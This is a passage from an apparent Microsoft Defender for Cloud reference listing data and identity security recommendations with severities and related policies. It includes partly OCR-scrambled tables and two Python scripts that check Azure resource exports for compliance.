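         "Microsoft.Sql/servers/encryptionProtector", {"serverKeyType": "AzureKeyVault"}),
    _res("Microsoft.DocumentDB/databaseAccounts/cosmos-open",
         "Microsoft.DocumentDB/databaseAccounts",
         {"publicNetworkAccess": "Enabled", "ipRules": [], "isVirtualNetworkFilterEnabled": False}),
    _res("Microsoft.DBforMySQL/servers/mysql-1", "Microsoft.DBforMySQL/servers", {}),
    _res("Microsoft.DBforMySQL/servers/mysql-1/administrators/activeDirectory",
         "Microsoft.DBforMySQL/servers/administrators", {"administratorType": "ActiveDirectory"}),
    _res("Microsoft.DBforPostgreSQL/servers/pg-1", "Microsoft.DBforPostgreSQL/servers", {}),
]

if __name__ == "__main__":
    for rid, failed in evaluate(SAMPLE_EXPORT).items():
        print(rid.rsplit("/", 1)[-1], "->", failed or "compliant")
```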


Recommendation 


Azure Spring Cloud 
should use network 
injection E 


Azure SQL Managed 
Instance 
authentication mode 
should be Azure 
Active Directory Only z 


Azure Synapse 
Workspace 
authentication mode 
should be Azure 

Active Directory Only ¢ 


Code repositories 
should have code 
scanning findings 
resolved Z 


Code repositories 
should have 
Dependabot 
scanning findings 
resolved Z 


Code repositories 
should have 
infrastructure as 
code scanning 
findings resolved 7 


Code repositories 
should have secret 
scanning findings 
resolved 7 


Description 


Azure Spring Cloud instances should use virtual network 
injection for the following purposes: 1. Isolate Azure Spring 
Cloud from Internet. 2. Enable Azure Spring Cloud to interact 
with systems in either on premises data centers or Azure 
service in other virtual networks. 3. Empower customers to 
control inbound and outbound network communications for 
Azure Spring Cloud. 

(Related policy: Azure Spring Cloud should use network 
injection £ ) 


Disabling local authentication methods and allowing only 
Azure Active Directory Authentication improves security by 
ensuring that Azure SQL Managed Instances can exclusively be 
accessed by Azure Active Directory identities. 

(Related policy: Azure SQL Managed Instance should have 
Azure Active Directory Only Authentication enabled £) 


Azure Synapse Workspace authentication mode should be 
Azure Active Directory Only 

Azure Active Directory only authentication methods improves 
security by ensuring that Synapse Workspaces exclusively 
require Azure AD identities for authentication. Learn more”. 
(Related policy: Synapse Workspaces should use only Azure 
Active Directory identities for authentication £) 


Defender for DevOps has found vulnerabilities in code 
repositories. To improve the security posture of the 
repositories, it is highly recommended to remediate these 
vulnerabilities. 

(No related policy) 


Defender for DevOps has found vulnerabilities in code 
repositories. To improve the security posture of the 
repositories, it is highly recommended to remediate these 
vulnerabilities. 

(No related policy) 


Defender for DevOps has found infrastructure as code security 
configuration issues in repositories. The issues shown below 
have been detected in template files. To improve the security 
posture of the related cloud resources, it is highly 
recommended to remediate these issues. 

(No related policy) 


Defender for DevOps has found a secret in code repositories. 
This should be remediated immediately to prevent a security 
breach. Secrets found in repositories can be leaked or 
discovered by adversaries, leading to compromise of an 


Severity 


Medium 


Medium 


Medium 


Medium 


Medium 


Medium 


High 


Recommendation 


Cognitive Services 
accounts should 
enable data 
encryption E 


Cognitive Services 
accounts should 
restrict network 
access E 


Cognitive Services 
accounts should use 
customer owned 
storage or enable 
data encryption E 


Diagnostic logs in 
Azure Data Lake 
Store should be 
enabled £ 


Diagnostic logs in 
Data Lake Analytics 
should be enabled Z 


Email notification for 
high severity alerts 
should be enabled Z 


Description 


application or service. For Azure DevOps, the Microsoft 
Security DevOps CredScan tool only scans builds on which it 
has been configured to run. Therefore, results may not reflect 
the complete status of secrets in your repositories. 

(No related policy) 


This policy audits any Cognitive Services account not using 
data encryption. For each Cognitive Services account with 
storage, should enable data encryption with either customer 
managed or Microsoft managed key. 

(Related policy: Cognitive Services accounts should enable 
data encryption £ ) 


Network access to Cognitive Services accounts should be 
restricted. Configure network rules so only applications from 
allowed networks can access the Cognitive Services account. 
To allow connections from specific internet or on-premises 
clients, access can be granted to traffic from specific Azure 
virtual networks or to public internet IP address ranges. 
(Related policy: Cognitive Services accounts should restrict 
network access Z) 


This policy audits any Cognitive Services account not using 
customer owned storage nor data encryption. For each 
Cognitive Services account with storage, use either customer 
owned storage or enable data encryption. 

(Related policy: Cognitive Services accounts should use 
customer owned storage or enable data encryption. £) 


Enable logs and retain them for up to a year. This enables you 
to recreate activity trails for investigation purposes when a 
security incident occurs or your network is compromised. 
(Related policy: Diagnostic logs in Azure Data Lake Store 
should be enabled £) 


Enable logs and retain them for up to a year. This enables you 
to recreate activity trails for investigation purposes when a 
security incident occurs or your network is compromised. 
(Related policy: Diagnostic logs in Data Lake Analytics should 
be enabled £ ) 


To ensure the relevant people in your organization are notified 
when there is a potential security breach in one of your 
subscriptions, enable email notifications for high severity alerts 
in Defender for Cloud. 

(Related policy: Email notification for high severity alerts 
should be enabled 2) 


Severity 


Low 


Medium 


Low 


Low 


Low 


Low 


Recommendation 


Email notification to 
subscription owner 
for high severity 
alerts should be 
enabled Z 


Enforce SSL 
connection should 
be enabled for 
MySQL database 
servers E 


Enforce SSL 
connection should 
be enabled for 
PostgreSQL database 
servers E 


Function apps 
should have 
vulnerability findings 
resolved Z 


Geo-redundant 
backup should be 
enabled for Azure 
Database for 
MariaDB Z 


Description 


To ensure your subscription owners are notified when there is 
a potential security breach in their subscription, set email 
notifications to subscription owners for high severity alerts in 
Defender for Cloud. 

(Related policy: Email notification to subscription owner for 
high severity alerts should be enabled  ) 


Azure Database for MySQL supports connecting your Azure 
Database for MySQL server to client applications using Secure 
Sockets Layer (SSL). 

Enforcing SSL connections between your database server and 
your client applications helps protect against 'man in the 
middle' attacks by encrypting the data stream between the 
server and your application. 

This configuration enforces that SSL is always enabled for 
accessing your database server. 

(Related policy: Enforce SSL connection should be enabled for 
MySQL database servers Z) 


Azure Database for PostgreSQL supports connecting your 
Azure Database for PostgreSQL server to client applications 
using Secure Sockets Layer (SSL). 

Enforcing SSL connections between your database server and 
your client applications helps protect against 'man in the 
middle' attacks by encrypting the data stream between the 
server and your application. 

This configuration enforces that SSL is always enabled for 
accessing your database server. 

(Related policy: Enforce SSL connection should be enabled for 
PostgreSQL database servers £ ) 


Runtime vulnerability scanning for functions scans your High 
function apps for security vulnerabilities and exposes detailed 
findings. Resolving the vulnerabilities can greatly improve your 
serverless applications security posture and protect them from 
attacks. 


(No related policy) 


Azure Database for MariaDB allows you to choose the Low 
redundancy option for your database server. 

It can be set to a geo-redundant backup storage in which the 

data is not only stored within the region in which your server is 
hosted, but is also replicated to a paired region to provide 

recovery options in case of a region failure. 

Configuring geo-redundant storage for backup is only allowed 

when creating a server. 

(Related policy: Geo-redundant backup should be enabled for 


Azure Database for MariaDB Z ) 


Severity 


Medium 


Medium 


Medium 


Recommendation: Geo-redundant backup should be enabled for Azure Database for MySQL
Severity: Low
Description: Azure Database for MySQL allows you to choose the redundancy option for your database server. It can be set to a geo-redundant backup storage in which the data is not only stored within the region in which your server is hosted, but is also replicated to a paired region to provide recovery options in case of a region failure. Configuring geo-redundant storage for backup is only allowed when creating a server.
(Related policy: Geo-redundant backup should be enabled for Azure Database for MySQL)

Recommendation: Geo-redundant backup should be enabled for Azure Database for PostgreSQL
Severity: Low
Description: Azure Database for PostgreSQL allows you to choose the redundancy option for your database server. It can be set to a geo-redundant backup storage in which the data is not only stored within the region in which your server is hosted, but is also replicated to a paired region to provide recovery options in case of a region failure. Configuring geo-redundant storage for backup is only allowed when creating a server.
(Related policy: Geo-redundant backup should be enabled for Azure Database for PostgreSQL)

Recommendation: GitHub repositories should have Code scanning enabled
Severity: Medium
Description: GitHub uses code scanning to analyze code in order to find security vulnerabilities and errors in code. Code scanning can be used to find, triage, and prioritize fixes for existing problems in your code. Code scanning can also prevent developers from introducing new problems. Scans can be scheduled for specific days and times, or scans can be triggered when a specific event occurs in the repository, such as a push. If code scanning finds a potential vulnerability or error in code, GitHub displays an alert in the repository. A vulnerability is a problem in a project's code that could be exploited to damage the confidentiality, integrity, or availability of the project.
(No related policy)

Recommendation: GitHub repositories should have Dependabot scanning enabled
Severity: Medium
Description: GitHub sends Dependabot alerts when it detects vulnerabilities in code dependencies that affect repositories. A vulnerability is a problem in a project's code that could be exploited to damage the confidentiality, integrity, or availability of the project or other projects that use its code. Vulnerabilities vary in type, severity, and method of attack. When code depends on a package that has a security vulnerability, this vulnerable dependency can cause a range of problems.
(No related policy)

Recommendation: GitHub repositories should have Secret scanning enabled
Severity: High
Description: GitHub scans repositories for known types of secrets, to prevent fraudulent use of secrets that were accidentally


committed to repositories. Secret scanning will scan the entire Git history on all branches present in the GitHub repository for any secrets. Examples of secrets are tokens and private keys that a service provider can issue for authentication. If a secret is checked into a repository, anyone who has read access to the repository can use the secret to access the external service with those privileges. Secrets should be stored in a dedicated, secure location outside the repository for the project.
(No related policy)

Recommendation: Microsoft Defender for Azure SQL Database servers should be enabled
Severity: High
Description: Microsoft Defender for SQL is a unified package that provides advanced SQL security capabilities. It includes functionality for surfacing and mitigating potential database vulnerabilities, detecting anomalous activities that could indicate a threat to your database, and discovering and classifying sensitive data.
Important: Protections from this plan are charged as shown on the Defender plans page. If you don't have any Azure SQL Database servers in this subscription, you won't be charged. If you later create Azure SQL Database servers on this subscription, they'll automatically be protected and charges will begin. Learn about the pricing details per region.
Learn more in Introduction to Microsoft Defender for SQL.
(Related policy: Azure Defender for Azure SQL Database servers should be enabled)

Recommendation: Microsoft Defender for DNS should be enabled
Severity: High
Description: Microsoft Defender for DNS provides an additional layer of protection for your cloud resources by continuously monitoring all DNS queries from your Azure resources. Defender for DNS alerts you about suspicious activity at the DNS layer. Learn more in Introduction to Microsoft Defender for DNS. Enabling this Defender plan results in charges. Learn about the pricing details per region on Defender for Cloud's pricing page: https://azure.microsoft.com/services/defender-for-cloud/#pricing.
(No related policy)

Recommendation: Microsoft Defender for open-source relational databases should be enabled
Severity: High
Description: Microsoft Defender for open-source relational databases detects anomalous activities indicating unusual and potentially harmful attempts to access or exploit databases. Learn more in Introduction to Microsoft Defender for open-source relational databases.
Important: Enabling this plan will result in charges for protecting your open-source relational databases. If you don't have any open-source relational databases in this subscription, no charges will be incurred. If you create any open-source relational databases on this subscription in the future, they will


automatically be protected and charges will begin at that time.
(No related policy)

Recommendation: Microsoft Defender for Resource Manager should be enabled
Severity: High
Description: Microsoft Defender for Resource Manager automatically monitors the resource management operations in your organization. Defender for Cloud detects threats and alerts you about suspicious activity. Learn more in Introduction to Microsoft Defender for Resource Manager. Enabling this Defender plan results in charges. Learn about the pricing details per region on Defender for Cloud's pricing page: https://azure.microsoft.com/services/defender-for-cloud/#pricing.
(No related policy)

Recommendation: Microsoft Defender for SQL on machines should be enabled on workspaces
Severity: Medium
Description: Microsoft Defender for servers brings threat detection and advanced defenses for your Windows and Linux machines. With this Defender plan enabled on your subscriptions but not on your workspaces, you're paying for the full capability of Microsoft Defender for servers but missing out on some of the benefits. When you enable Microsoft Defender for servers on a workspace, all machines reporting to that workspace will be billed for Microsoft Defender for servers, even if they're in subscriptions without Defender plans enabled. Unless you also enable Microsoft Defender for servers on the subscription, those machines won't be able to take advantage of just-in-time VM access, adaptive application controls, and network detections for Azure resources. Learn more in Introduction to Microsoft Defender for servers.
(No related policy)

Recommendation: Microsoft Defender for SQL servers on machines should be enabled
Severity: High
Description: Microsoft Defender for SQL is a unified package that provides advanced SQL security capabilities. It includes functionality for surfacing and mitigating potential database vulnerabilities, detecting anomalous activities that could indicate a threat to your database, and discovering and classifying sensitive data.
Important: Remediating this recommendation will result in charges for protecting your SQL servers on machines. If you don't have any SQL servers on machines in this subscription, no charges will be incurred. If you create any SQL servers on machines on this subscription in the future, they will automatically be protected and charges will begin at that time. Learn more about Microsoft Defender for SQL servers on machines.


(Related policy: Azure Defender for SQL servers on machines should be enabled)

Recommendation: Microsoft Defender for SQL should be enabled for unprotected Azure SQL servers
Severity: High
Description: Microsoft Defender for SQL is a unified package that provides advanced SQL security capabilities. It surfaces and mitigates potential database vulnerabilities, and detects anomalous activities that could indicate a threat to your database. Microsoft Defender for SQL is billed as shown on pricing details per region.
(Related policy: Advanced data security should be enabled on your SQL servers)

Recommendation: Microsoft Defender for SQL should be enabled for unprotected SQL Managed Instances
Severity: High
Description: Microsoft Defender for SQL is a unified package that provides advanced SQL security capabilities. It surfaces and mitigates potential database vulnerabilities, and detects anomalous activities that could indicate a threat to your database. Microsoft Defender for SQL is billed as shown on pricing details per region.
(Related policy: Advanced data security should be enabled on SQL Managed Instance)

Recommendation: Microsoft Defender for Storage should be enabled
Severity: High
Description: Microsoft Defender for Storage detects unusual and potentially harmful attempts to access or exploit storage accounts.
Important: Protections from this plan are charged as shown on the Defender plans page. If you don't have any Azure Storage accounts in this subscription, you won't be charged. If you later create Azure Storage accounts on this subscription, they'll automatically be protected and charges will begin. Learn about the pricing details per region.
Learn more in Introduction to Microsoft Defender for Storage.
(Related policy: Azure Defender for Storage should be enabled)

Recommendation: Network Watcher should be enabled
Severity: Low
Description: Network Watcher is a regional service that enables you to monitor and diagnose conditions at a network scenario level in, to, and from Azure. Scenario-level monitoring enables you to diagnose problems with an end-to-end view of the network. Network diagnostic and visualization tools available with Network Watcher help you understand, diagnose, and gain insights into your network in Azure.
(Related policy: Network Watcher should be enabled)

Recommendation: Over-provisioned identities in subscriptions should be investigated to reduce the Permission Creep Index (PCI)
Severity: Medium
Description: Over-provisioned identities in subscriptions should be investigated to reduce the Permission Creep Index (PCI) and to safeguard your infrastructure. Reduce the PCI by removing the unused high-risk permission assignments. A high PCI reflects the risk associated with identities whose permissions exceed


their normal or required usage.
(No related policy)

Recommendation: Private endpoint connections on Azure SQL Database should be enabled
Severity: Medium
Description: Private endpoint connections enforce secure communication by enabling private connectivity to Azure SQL Database.
(Related policy: Private endpoint connections on Azure SQL Database should be enabled)

Recommendation: Private endpoint should be enabled for MariaDB servers
Severity: Medium
Description: Private endpoint connections enforce secure communication by enabling private connectivity to Azure Database for MariaDB. Configure a private endpoint connection to enable access to traffic coming only from known networks and prevent access from all other IP addresses, including within Azure.
(Related policy: Private endpoint should be enabled for MariaDB servers)

Recommendation: Private endpoint should be enabled for MySQL servers
Severity: Medium
Description: Private endpoint connections enforce secure communication by enabling private connectivity to Azure Database for MySQL. Configure a private endpoint connection to enable access to traffic coming only from known networks and prevent access from all other IP addresses, including within Azure.
(Related policy: Private endpoint should be enabled for MySQL servers)

Recommendation: Private endpoint should be enabled for PostgreSQL servers
Severity: Medium
Description: Private endpoint connections enforce secure communication by enabling private connectivity to Azure Database for PostgreSQL. Configure a private endpoint connection to enable access to traffic coming only from known networks and prevent access from all other IP addresses, including within Azure.
(Related policy: Private endpoint should be enabled for PostgreSQL servers)

Recommendation: Public network access on Azure SQL Database should be disabled
Severity: Medium
Description: Disabling the public network access property improves security by ensuring your Azure SQL Database can only be accessed from a private endpoint. This configuration denies all logins that match IP or virtual network based firewall rules.
(Related policy: Public network access on Azure SQL Database should be disabled)

Recommendation: Public network access should be disabled for Cognitive Services accounts
Severity: Medium
Description: This policy audits any Cognitive Services account in your environment with public network access enabled. Public network access should be disabled so that only connections from private endpoints are allowed.
(Related policy: Public network access should be disabled for Cognitive Services accounts)


Recommendation: Public network access should be disabled for MariaDB servers
Severity: Medium
Description: Disable the public network access property to improve security and ensure your Azure Database for MariaDB can only be accessed from a private endpoint. This configuration strictly disables access from any public address space outside of the Azure IP range, and denies all logins that match IP or virtual network-based firewall rules.
(Related policy: Public network access should be disabled for MariaDB servers)

Recommendation: Public network access should be disabled for MySQL servers
Severity: Medium
Description: Disable the public network access property to improve security and ensure your Azure Database for MySQL can only be accessed from a private endpoint. This configuration strictly disables access from any public address space outside of the Azure IP range, and denies all logins that match IP or virtual network-based firewall rules.
(Related policy: Public network access should be disabled for MySQL servers)

Recommendation: Public network access should be disabled for PostgreSQL servers
Severity: Medium
Description: Disable the public network access property to improve security and ensure your Azure Database for PostgreSQL can only be accessed from a private endpoint. This configuration disables access from any public address space outside of the Azure IP range, and denies all logins that match IP or virtual network-based firewall rules.
(Related policy: Public network access should be disabled for PostgreSQL servers)

Recommendation: Redis Cache should allow access only via SSL
Severity: High
Description: Enable only connections via SSL to Redis Cache. Use of secure connections ensures authentication between the server and the service and protects data in transit from network-layer attacks such as man-in-the-middle, eavesdropping, and session hijacking.
(Related policy: Only secure connections to your Azure Cache for Redis should be enabled)

Recommendation: SQL databases should have vulnerability findings resolved
Severity: High
Description: SQL Vulnerability assessment scans your database for security vulnerabilities, and exposes any deviations from best practices such as misconfigurations, excessive permissions, and unprotected sensitive data. Resolving the vulnerabilities found can greatly improve your database security posture. Learn more.
(Related policy: Vulnerabilities on your SQL databases should be remediated)

Recommendation: SQL managed instances should have vulnerability assessment configured
Severity: High
Description: Vulnerability assessment can discover, track, and help you remediate potential database vulnerabilities.
(Related policy: Vulnerability assessment should be enabled on SQL Managed Instance)


Recommendation: SQL servers on machines should have vulnerability findings resolved
Severity: High
Description: SQL Vulnerability assessment scans your database for security vulnerabilities, and exposes any deviations from best practices such as misconfigurations, excessive permissions, and unprotected sensitive data. Resolving the vulnerabilities found can greatly improve your database security posture. Learn more.
(Related policy: Vulnerabilities on your SQL servers on machine should be remediated)

Recommendation: SQL servers should have an Azure Active Directory administrator provisioned
Severity: High
Description: Provision an Azure AD administrator for your SQL server to enable Azure AD authentication. Azure AD authentication enables simplified permission management and centralized identity management of database users and other Microsoft services.
(Related policy: An Azure Active Directory administrator should be provisioned for SQL servers)

Recommendation: SQL servers should have vulnerability assessment configured
Severity: High
Description: Vulnerability assessment can discover, track, and help you remediate potential database vulnerabilities.
(Related policy: Vulnerability assessment should be enabled on your SQL servers)

Recommendation: Storage account should use a private link connection
Severity: Medium
Description: Private links enforce secure communication by providing private connectivity to the storage account.
(Related policy: Storage account should use a private link connection)

Recommendation: Storage accounts should be migrated to new Azure Resource Manager resources
Severity: Low
Description: To benefit from new capabilities in Azure Resource Manager, you can migrate existing deployments from the Classic deployment model. Resource Manager enables security enhancements such as stronger access control (RBAC), better auditing, ARM-based deployment and governance, access to managed identities, access to Key Vault for secrets, Azure AD-based authentication, and support for tags and resource groups for easier security management. Learn more.
(Related policy: Storage accounts should be migrated to new Azure Resource Manager resources)

Recommendation: Storage accounts should restrict network access using virtual network rules
Severity: Medium
Description: Protect your storage accounts from potential threats using virtual network rules as a preferred method instead of IP-based filtering. Disabling IP-based filtering prevents public IPs from accessing your storage accounts.
(Related policy: Storage accounts should restrict network access using virtual network rules)
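The network-exposure rows above (private endpoints, public network access, SSL-only Redis, storage network rules) are all checks a posture tool can evaluate from a resource's ARM properties. The script below is an added example, not code from this page or from Microsoft, showing how such an evaluation works over a resource inventory in the shape of an ARM export. The property names it reads (publicNetworkAccess, privateEndpointConnections, enableNonSslPort, networkAcls.defaultAction) follow the ARM resource schemas as assumed here, the recommendation texts and severities are those listed on the page, and the inventory is constructed sample data with a placeholder subscription id. It generalizes the page's per-flavor rows by applying one rule pair to MariaDB, MySQL and PostgreSQL servers.

```python
"""Evaluate several Defender for Cloud network-exposure recommendations
against an ARM-shaped resource inventory (added example; constructed data)."""
from collections import Counter
from dataclasses import dataclass
from typing import Any, Callable

SEVERITY_RANK = {"High": 0, "Medium": 1, "Low": 2}


@dataclass(frozen=True)
class Rule:
    resource_type: str                              # ARM resource type the rule applies to
    recommendation: str                             # recommendation text as listed on the page
    severity: str                                   # severity as listed on the page
    noncompliant: Callable[[dict[str, Any]], bool]  # True when the resource fails the rule


@dataclass(frozen=True)
class Finding:
    resource_id: str
    recommendation: str
    severity: str


def public_access_enabled(props: dict[str, Any]) -> bool:
    # Assumed ARM property: publicNetworkAccess is "Enabled" or "Disabled";
    # a missing value is treated as the insecure default.
    return props.get("publicNetworkAccess", "Enabled") != "Disabled"


def no_private_endpoint(props: dict[str, Any]) -> bool:
    # Assumed ARM property: privateEndpointConnections lists the approved connections.
    return not props.get("privateEndpointConnections")


def db_rules(flavor: str) -> list[Rule]:
    """Azure Database for MariaDB, MySQL and PostgreSQL share the same two rules."""
    rtype = f"Microsoft.DBfor{flavor}/servers"
    return [
        Rule(rtype, f"Public network access should be disabled for {flavor} servers",
             "Medium", public_access_enabled),
        Rule(rtype, f"Private endpoint should be enabled for {flavor} servers",
             "Medium", no_private_endpoint),
    ]


RULES: list[Rule] = [
    *db_rules("MariaDB"), *db_rules("MySQL"), *db_rules("PostgreSQL"),
    Rule("Microsoft.Sql/servers",
         "Public network access on Azure SQL Database should be disabled",
         "Medium", public_access_enabled),
    Rule("Microsoft.Sql/servers",
         "Private endpoint connections on Azure SQL Database should be enabled",
         "Medium", no_private_endpoint),
    # Assumed ARM property: enableNonSslPort keeps the plaintext Redis port open.
    Rule("Microsoft.Cache/Redis", "Redis Cache should allow access only via SSL",
         "High", lambda p: bool(p.get("enableNonSslPort", False))),
    # Assumed ARM property: networkAcls.defaultAction "Deny" limits the account to
    # its virtual network / IP rules; "Allow" admits every network.
    Rule("Microsoft.Storage/storageAccounts",
         "Storage accounts should restrict network access using virtual network rules",
         "Medium", lambda p: p.get("networkAcls", {}).get("defaultAction", "Allow") != "Deny"),
]


def evaluate(inventory: list[dict[str, Any]]) -> list[Finding]:
    """One Finding per (resource, failed rule), highest severity first."""
    findings = []
    for res in inventory:
        props = res.get("properties", {})
        for rule in RULES:
            if rule.resource_type.lower() == res["type"].lower() and rule.noncompliant(props):
                findings.append(Finding(res["id"], rule.recommendation, rule.severity))
    return sorted(findings, key=lambda f: (SEVERITY_RANK[f.severity], f.resource_id))


def severity_counts(findings: list[Finding]) -> dict[str, int]:
    return dict(Counter(f.severity for f in findings))


# Constructed sample inventory: placeholder subscription id, no real resources.
PREFIX = "/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/rg-sample/providers/"
SAMPLE_INVENTORY = [
    {"id": PREFIX + "Microsoft.DBforPostgreSQL/servers/pg-sample",
     "type": "Microsoft.DBforPostgreSQL/servers",
     "properties": {"publicNetworkAccess": "Enabled", "privateEndpointConnections": []}},
    {"id": PREFIX + "Microsoft.DBforMySQL/servers/mysql-sample",
     "type": "Microsoft.DBforMySQL/servers",
     "properties": {"publicNetworkAccess": "Disabled",
                    "privateEndpointConnections": [{"id": "pe-1"}]}},
    {"id": PREFIX + "Microsoft.Sql/servers/sql-sample",
     "type": "Microsoft.Sql/servers",
     "properties": {"publicNetworkAccess": "Enabled",
                    "privateEndpointConnections": [{"id": "pe-2"}]}},
    {"id": PREFIX + "Microsoft.Cache/Redis/redis-sample",
     "type": "Microsoft.Cache/Redis",
     "properties": {"enableNonSslPort": True}},
    {"id": PREFIX + "Microsoft.Storage/storageAccounts/stsample",
     "type": "Microsoft.Storage/storageAccounts",
     "properties": {"networkAcls": {"defaultAction": "Allow", "virtualNetworkRules": []}}},
]

if __name__ == "__main__":
    for f in evaluate(SAMPLE_INVENTORY):
        print(f"{f.severity:6} {f.recommendation}  [{f.resource_id.rsplit('/', 1)[-1]}]")
    print(severity_counts(evaluate(SAMPLE_INVENTORY)))
```

Run as-is it reports five findings on the constructed inventory: the Redis cache with its non-SSL port open (High), both rules for the PostgreSQL server, the Azure SQL server that still allows public network access, and the storage account whose default network action is Allow. A missing property is deliberately treated as the insecure default so that an incomplete export surfaces as a finding rather than silently passing.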


Recommendation: Subscriptions should have a contact email address for security issues
Severity: Low
Description: To ensure the relevant people in your organization are notified when there is a potential security breach in one of your subscriptions, set a security contact to receive email notifications from Defender for Cloud.
(Related policy: Subscriptions should have a contact email address for security issues)

Recommendation: Transparent Data Encryption on SQL databases should be enabled
Severity: Low
Description: Enable transparent data encryption to protect data at rest and meet compliance requirements.
(Related policy: Transparent Data Encryption on SQL databases should be enabled)

Recommendation: VM Image Builder templates should use private link
Severity: Medium
Description: Audit VM Image Builder templates that do not have a virtual network configured. When a virtual network is not configured, a public IP is created and used instead, which may directly expose resources to the internet and increase the potential attack surface.
(Related policy: VM Image Builder templates should use private link)

Recommendation: Web Application Firewall (WAF) should be enabled for Application Gateway
Severity: Low
Description: Deploy Azure Web Application Firewall (WAF) in front of public-facing web applications for additional inspection of incoming traffic. Web Application Firewall (WAF) provides centralized protection of your web applications from common exploits and vulnerabilities such as SQL injection, cross-site scripting, and local and remote file execution. You can also restrict access to your web applications by countries/regions, IP address ranges, and other HTTP(S) parameters via custom rules.
(Related policy: Web Application Firewall (WAF) should be enabled for Application Gateway)

Recommendation: Web Application Firewall (WAF) should be enabled for Azure Front Door Service service
Severity: Low
Description: Deploy Azure Web Application Firewall (WAF) in front of public-facing web applications for additional inspection of incoming traffic. Web Application Firewall (WAF) provides centralized protection of your web applications from common exploits and vulnerabilities such as SQL injection, cross-site scripting, and local and remote file execution. You can also restrict access to your web applications by countries/regions, IP address ranges, and other HTTP(S) parameters via custom rules.
(Related policy: Web Application Firewall (WAF) should be enabled for Azure Front Door Service service)


IdentityAndAccess recommendations


There are 29 recommendations in this category.


Recommendation: A maximum of 3 owners should be designated for subscriptions
Severity: High
Description: To reduce the potential for breaches by compromised owner accounts, we recommend limiting the number of owner accounts to a maximum of 3.
(Related policy: A maximum of 3 owners should be designated for your subscription)

Recommendation: Accounts with owner permissions on Azure resources should be MFA enabled
Severity: High
Description: If you only use passwords to authenticate your users, you are leaving an attack vector open. Users often use weak passwords for multiple services. By enabling Multi-Factor Authentication (MFA), you provide better security for your accounts, while still allowing your users to authenticate to almost any application with single sign-on (SSO). Multi-factor authentication is a process by which users are prompted, during the sign-in process, for an additional form of identification. For example, a code may be sent to their cellphone, or they may be asked for a fingerprint scan. We recommend that you enable MFA for all accounts that have owner permissions on Azure resources, to prevent breaches and attacks.
More details and frequently asked questions are available here: Manage multi-factor authentication (MFA) enforcement on your subscriptions
(No related policy)

Recommendation: Accounts with read permissions on Azure resources should be MFA enabled
Severity: High
Description: If you only use passwords to authenticate your users, you are leaving an attack vector open. Users often use weak passwords for multiple services. By enabling Multi-Factor Authentication (MFA), you provide better security for your accounts, while still allowing your users to authenticate to almost any application with single sign-on (SSO). Multi-factor authentication is a process by which users are prompted, during the sign-in process, for an additional form of identification. For example, a code may be sent to their cellphone, or they may be asked for a fingerprint scan. We recommend that you enable MFA for all accounts that have read permissions on Azure resources, to prevent breaches and attacks.
More details and frequently asked questions are available here: Manage multi-factor authentication (MFA) enforcement on your subscriptions
(No related policy)

Recommendation: Accounts with write permissions on Azure resources should be MFA enabled
Severity: High
Description: If you only use passwords to authenticate your users, you are leaving an attack vector open. Users often use weak passwords for multiple services. By enabling Multi-Factor Authentication (MFA), you provide better security for your accounts, while still allowing your users to authenticate to almost any application with single sign-on (SSO). Multi-factor authentication is a process by which users are prompted, during the sign-in process, for an additional form of identification. For example, a code may be sent to their cellphone, or they may be asked for a fingerprint scan. We recommend that you enable MFA for all accounts that have write permissions on Azure resources, to prevent breaches and attacks.
More details and frequently asked questions are available here: Manage multi-factor authentication (MFA) enforcement on your subscriptions
(No related policy)

Recommendation: Azure Cosmos DB accounts should use Azure Active Directory as the only authentication method
Severity: Medium
Description: The best way to authenticate to Azure services is by using Role-Based Access Control (RBAC). RBAC allows you to maintain the minimum privilege principle and supports the ability to revoke permissions as an effective method of response when compromised. You can configure your Azure Cosmos DB account to enforce RBAC as the only authentication method. When the enforcement is configured, all other methods of access will be denied (primary/secondary keys and access tokens).
(No related policy)

Recommendation: Blocked accounts with owner permissions on Azure resources should be removed
Severity: High
Description: Accounts that have been blocked from signing in on Active Directory should be removed from your Azure resources. These accounts can be targets for attackers looking to find ways to access your data without being noticed.
(No related policy)

Recommendation: Blocked accounts with read and write permissions on Azure resources should be removed
Severity: High
Description: Accounts that have been blocked from signing in on Active Directory should be removed from your Azure resources. These accounts can be targets for attackers looking to find ways to access your data without being noticed.
(No related policy)

Recommendation: Deprecated accounts should be removed from subscriptions
Severity: High
Description: User accounts that have been blocked from signing in should be removed from your subscriptions. These accounts can be targets for attackers looking to find ways to access your data without being noticed.
(Related policy: Deprecated accounts should be removed from your subscription)

Recommendation: Deprecated accounts with owner permissions should be removed from subscriptions
Severity: High
Description: User accounts that have been blocked from signing in should be removed from your subscriptions. These accounts can be targets for attackers looking to find ways to access your data without being noticed.
(Related policy: Deprecated accounts with owner permissions should be removed from your subscription)


Recommendation: Diagnostic logs in Key Vault should be enabled
Severity: Low
Description: Enable logs and retain them for up to a year. This enables you to recreate activity trails for investigation purposes when a security incident occurs or your network is compromised.
(Related policy: Diagnostic logs in Key Vault should be enabled)

Recommendation: External accounts with owner permissions should be removed from subscriptions
Severity: High
Description: Accounts with owner permissions that have different domain names (external accounts) should be removed from your subscription. This prevents unmonitored access. These accounts can be targets for attackers looking to find ways to access your data without being noticed.
(Related policy: External accounts with owner permissions should be removed from your subscription)

Recommendation: External accounts with read permissions should be removed from subscriptions
Severity: High
Description: Accounts with read permissions that have different domain names (external accounts) should be removed from your subscription. This prevents unmonitored access. These accounts can be targets for attackers looking to find ways to access your data without being noticed.
(Related policy: External accounts with read permissions should be removed from your subscription)

Recommendation: External accounts with write permissions should be removed from subscriptions
Severity: High
Description: Accounts with write permissions that have different domain names (external accounts) should be removed from your subscription. This prevents unmonitored access. These accounts can be targets for attackers looking to find ways to access your data without being noticed.
(Related policy: External accounts with write permissions should be removed from your subscription)

Recommendation: Firewall should be enabled on Key Vault
Severity: Medium
Description: Key Vault's firewall prevents unauthorized traffic from reaching your key vault and provides an additional layer of protection for your secrets. Enable the firewall to make sure that only traffic from allowed networks can access your key vault.
(Related policy: Firewall should be enabled on Key Vault)

Recommendation: Guest accounts with owner permissions on Azure resources should be removed
Severity: High
Description: Accounts with owner permissions that have been provisioned outside of the Azure Active Directory tenant (different domain names) should be removed from your Azure resources. Guest accounts are not managed to the same standards as enterprise tenant identities. These accounts can be targets for attackers looking to find ways to access your data without being noticed.
(No related policy)


Recommendation: Guest accounts with read permissions on Azure resources should be removed
Severity: High
